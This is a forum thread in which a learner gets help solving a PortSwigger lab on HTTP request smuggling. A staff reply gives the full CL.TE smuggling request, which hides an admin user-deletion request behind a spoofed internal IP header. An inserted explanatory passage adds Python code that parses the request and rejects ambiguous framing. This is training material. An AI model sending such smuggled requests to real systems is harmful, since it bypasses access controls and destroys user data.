Burp Suite User Forum


LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

Adam | Last updated: Nov 27, 2021 04:51AM UTC

Hello, I have followed everything exactly as written in the tutorial and in the video. At the end of the video Michael Sommer says "the lab is solved", but it isn't, and he has to keep trying and trying for two minutes before he finally gets it to change to SOLVED. I'm exactly at that point. Yes, in REPEATER "Update Content-Length" is unchecked. I do have "HTTP Request Smuggler" installed. In solution #5 I couldn't see the admin panel, so I went on to #6. I get to #6 in the Solution and it acknowledges the 127.0.0.1 with "Admin interface only available if logged in as an administrator, or if requested from 127.0.0.1"... I change the 127.0.0.1 address to the one I was able to get in #3, but I am still unable to solve the lab. I had seen Michael Sommer have the same problem and solve it in two minutes, but although I followed every keystroke, after 6 hours I still can't solve it. What could I possibly be doing wrong??? Any help would be greatly appreciated, thank you.

Adam | Last updated: Nov 27, 2021 03:07PM UTC

I do have 2 spaces after x=1

Ben, PortSwigger Agent | Last updated: Nov 29, 2021 09:56AM UTC

Hi Adam, just to confirm, it sounds like you are changing the address from 127.0.0.1 to the IP returned as a result of the request sent in step 3, is that correct? You do not need to change the IP address, you just need to add the header that is returned from the request in step 3 and give it the value 127.0.0.1. I.e. in the lab attempt I have just carried out, the header returned was X-ayZFvQ-Ip, so the final request I sent was:

    POST / HTTP/1.1
    Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 166
    Transfer-Encoding: chunked

    0

    GET /admin/delete?username=carlos HTTP/1.1
    X-ayZFvQ-Ip: 127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 10
    Connection: close

    x=1
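To see why the request Ben quotes is parsed as two requests, here is an added Python example (not code from the lab, PortSwigger or either poster) that frames those same bytes the way a Content-Length front-end and a chunked back-end each would, and includes the check a front-end should apply: a request carrying both framing headers is ambiguous and must be rejected rather than forwarded. The header name X-ayZFvQ-Ip and the host are taken from Ben's post; CRLF line endings are restored.

```python
# Request as Ben posted it, CRLF line endings restored (constructed here).
RAW = (
    b"POST / HTTP/1.1\r\n"
    b"Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 166\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
    b"GET /admin/delete?username=carlos HTTP/1.1\r\n"
    b"X-ayZFvQ-Ip: 127.0.0.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 10\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"x=1"
)

def split_head(raw):
    """Return (request line, lowercase header dict, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest

def body_by_content_length(raw):
    """Front-end view: body is exactly Content-Length bytes; return (body, leftover)."""
    _, headers, rest = split_head(raw)
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]

def body_by_chunked(raw):
    """Back-end view: read chunks up to the 0 chunk; return (body, leftover)."""
    _, headers, rest = split_head(raw)
    body, pos = b"", 0
    while True:
        line_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            return body, rest[rest.index(b"\r\n", pos) + 2:]  # skip empty trailer
        body += rest[pos:pos + size]
        pos += size + 2  # chunk data plus its CRLF

def ambiguous_framing(raw):
    """Mitigation: both headers present means the request must be rejected, not forwarded."""
    _, headers, _ = split_head(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers
```

The front-end view consumes all 166 body bytes as one request, while the chunked view stops at the 0 chunk and leaves the GET /admin/delete request waiting on the connection, which is the desync the lab exercises.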

Adam | Last updated: Nov 29, 2021 08:07PM UTC

After I read your response and looked over everything in detail, I smacked my head in response, realizing I had missed the header response. I popped the header response in and solved the lab in about 20 seconds. After working on this lab for so long and realizing my unbelievable faux pas, I definitely have a strong understanding of the topic. Thank you for all your help. Sincerely, Adam...
